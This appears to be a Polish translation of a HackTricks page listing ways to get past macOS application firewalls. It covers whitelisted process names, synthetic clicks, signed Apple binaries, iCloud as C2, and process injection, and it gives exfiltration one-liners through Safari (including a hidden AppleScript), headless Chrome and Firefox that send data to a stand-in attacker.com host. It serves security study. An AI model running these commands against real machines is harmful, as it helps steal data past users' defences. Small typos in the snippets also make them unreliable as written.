4.7 KiB
Bypassowanie zapór sieciowych w systemie macOS
Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć reklamę swojej firmy w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCYJNY!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na GitHubie.
Znalezione techniki
Następujące techniki zostały znalezione i działają w niektórych aplikacjach zapór sieciowych w systemie macOS.
Wykorzystywanie nazw na białej liście
- Na przykład nadanie złośliwemu oprogramowaniu nazw znanych procesów systemu macOS, takich jak
launchd
Syntetyczne kliknięcie
- Jeśli zapora sieciowa wymaga zgody użytkownika, złośliwe oprogramowanie może kliknąć na przycisk "Zezwól"
Używanie podpisanych binariów Apple
- Na przykład
curl
, ale także inne, takie jakwhois
Znane domeny Apple
Zapora sieciowa może zezwalać na połączenia z znanymi domenami Apple, takimi jak apple.com
lub icloud.com
. iCloud może być wykorzystywany jako C2.
Ogólne obejście
Kilka pomysłów na próbę obejścia zapór sieciowych
Sprawdź dozwolony ruch
Znajomość dozwolonego ruchu pomoże Ci zidentyfikować potencjalnie uwzględnione na białej liście domeny lub aplikacje, które mają do nich dostęp.
lsof -i TCP -sTCP:ESTABLISHED
Wykorzystywanie DNS
Rozwiązania DNS są realizowane za pomocą podpisanego programu mdnsreponder
, który prawdopodobnie będzie miał dostęp do serwerów DNS.
Za pomocą aplikacji przeglądarki
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
{% endcode %}
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Za pomocą wstrzykiwania procesów
Jeśli możesz wstrzyknąć kod do procesu, który ma uprawnienia do łączenia się z dowolnym serwerem, możesz ominąć zabezpieczenia zapory ogniowej:
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
Odwołania
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.